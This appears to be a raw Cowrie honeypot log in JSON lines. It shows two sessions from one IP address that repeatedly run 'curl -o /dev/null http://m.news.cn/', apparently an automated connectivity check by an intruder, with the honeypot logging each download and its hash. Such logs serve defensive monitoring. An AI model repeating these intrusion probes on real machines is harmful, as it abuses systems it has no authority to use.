{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.438261Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.451874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.453052Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.459280Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.464366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.465161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.491402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.492510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.498894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.499514Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.505559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.506394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.523013Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.524040Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.537129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.538203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.554718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.555719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.573940Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.581569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.582751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.605570Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.606648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.608527Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.621477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.628691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.629906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.651958Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.655390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.656394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.659095Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.674169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.675428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.714101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.715375Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.728666Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.729891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.774176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.775041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.782382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.783959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.803720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.807131Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.837328Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.841803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.842802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.851023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.854734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.856167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.863661Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.876945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.903212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.904339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.908828Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.909698Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.940490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.946953Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.962406Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.963651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.967207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.969165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.971950Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.976662Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.014481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.015791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.024723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.025812Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.051392Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.054562Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.055325Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.056650Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.057325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.063315Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.066646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.068725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.096454Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.098523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.099704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.112049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.112873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.124444Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.128133Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.136009Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.137047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.142070Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.148543Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.151983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
